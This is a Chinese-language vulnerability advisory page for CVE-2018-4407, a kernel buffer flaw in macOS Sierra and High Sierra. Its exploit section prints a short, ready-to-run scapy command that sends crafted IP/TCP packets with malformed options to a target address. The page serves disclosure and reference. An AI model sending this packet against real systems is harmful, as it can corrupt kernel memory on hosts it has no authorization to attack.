Apple macOS Sierra Kernel 安全漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1377130 漏洞类型 缓冲区错误
发布时间 2018-11-01 更新时间 2019-04-09
CVE编号 CVE-2018-4407 CNNVD-ID CNNVD-201810-1510
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018110001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201810-1510
|漏洞详情
Apple macOS High Sierra等都是美国苹果(Apple)公司的一套专为Mac计算机所开发的专用操作系统。 Apple macOS Sierra 10.12.6版本和macOS High Sierra 10.13.6版本中的Kernel组件存在安全漏洞。攻击者可利用该漏洞执行任意代码(内存损坏)。
|漏洞EXP
pip install scapy
sudo scapy 
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))
|参考资料

来源:securitytracker.com

链接:https://securitytracker.com/id/1042004